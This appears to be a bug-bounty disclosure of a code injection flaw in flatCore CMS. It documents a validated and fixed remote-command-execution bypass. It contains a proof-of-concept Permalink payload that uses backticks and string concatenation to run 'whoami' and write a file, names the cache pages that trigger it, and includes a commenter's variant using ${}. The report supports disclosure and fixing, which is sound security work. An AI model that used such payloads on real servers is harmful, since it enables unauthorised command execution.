Code Injection in flatcore/flatcore-cms

Valid

Reported on

Oct 11th 2021

Description

Bypass of remote code execution in https://github.com/flatCore/flatCore-CMS/issues/59

The following payload uses . for concatenation and ` to execute system commands.

Proof of Concept

  1. Insert the following as Permalink value
lol".`whoami>pwned.txt`."
  1. Go to http://10.0.2.15/flatCore-CMS/content/cache/cache_lastedit.php to execute the payload, check the filesystem to see pwned.txt.

Impact

This vulnerability is capable of blind remote command execution as admin user.

haxatron modified the report
a year ago
haxatron
a year ago

Researcher

http://10.0.2.15/flatCore-CMS/content/cache/active_urls.php also works. Additionally, all other vulnerabilities reported works in develop branch

Patrick validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrick marked this as fixed with commit a2688a a year ago
Patrick has been awarded the fix bounty
This vulnerability will not receive a CVE
functions.php#L388-L399 has been validated
hi-unc1e
a year ago

Can we use ${} to execute command? e.g.

lol".${reboot}."
hi-unc1e
a year ago

sorry, i misunderstood the use, but i DO think that $ should be escaped as well

haxatron
a year ago

Researcher

agreed ^

$ can be used to inject existing PHP variables which may lead to a bypass

to join this conversation